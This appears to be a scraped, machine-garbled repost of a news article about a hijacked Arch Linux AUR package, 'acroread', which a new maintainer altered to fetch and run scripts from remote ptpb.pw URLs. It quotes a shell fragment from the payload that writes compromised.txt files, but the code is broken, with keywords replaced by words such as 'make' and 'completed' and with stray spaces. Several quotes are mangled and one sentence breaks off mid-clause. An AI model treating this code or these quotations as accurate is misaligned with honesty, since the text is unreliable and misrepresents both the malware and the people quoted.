Arch Linux PDF package poisoned package • The registry



[ad_1]

Arch Linux extracted a user-provided AUR (Arch User Repository) package because it contained malicious software.

If you are an Arch Linux user who has downloaded a PDF viewer named "acroread" in the short time frame you have to delete it. Although the breach is not considered serious, it sparked a debate over the security of unapproved software

The user repository included the acroread package, which had been dropped by its maintainer. Someone using the handle "xeactor" adopted the package and modified it to download malicious scripts from a remote server

  Young man in front of a laptop

Gentoo GitHub repo hack made possible by these 3 beginner errors

READ

When this was discovered, the maintainer Eli Schwartz canceled the commits, suspended the xeactor account, and discovered (and removed) two more packages with similar changes.

A subsequent post in the Arch Linux mailing list suggested "the attack" was a warning of another problem. As Bennett Piater wrote: "A script that creates compromised.txt in the root and all the starting files seems to me to be a warning."

Here is the code that created the text file "warning":

  for x in / root / home / *; make
if [[ -w "$x/compromised.txt" ]]; then
echo "$ FULL_LOG"> "$ x / compromised.txt"
Fi
completed

The purpose of modified lines in acroread was to use curl to download scripts from a remote site, and the script (if it worked) to reconfigure systemd to restart on a

Lending even more weight to his warning status was another message from Schwartz: "Note on the legs of acroread: https: // ptpb. pw / ~ x was executed by the PKGBUILD who in turn executed https://ptpb.pw/~u But the thing that he installs declares a download function (19459012) of ss then tries to run the contents of $ uploader to actually download the data collection. "

Schwartz said that" as - is ", this code would not work.

Arch's Giancarlo Razzolini suggested that the AURs provided by the user (and therefore unsafe) might contain the wrong code is an overreaction

"This wire attracts a lot more than". careful than justified, "He wrote (oh, and now it's in the media ... sorry). "I'm surprised that this type of stupid takeover and introduction of malware does not happen more often," Razzolini added. ®

Sponsored By:
Minds Mastering Machines - Call for Papers Now Open

[ad_2]
Source link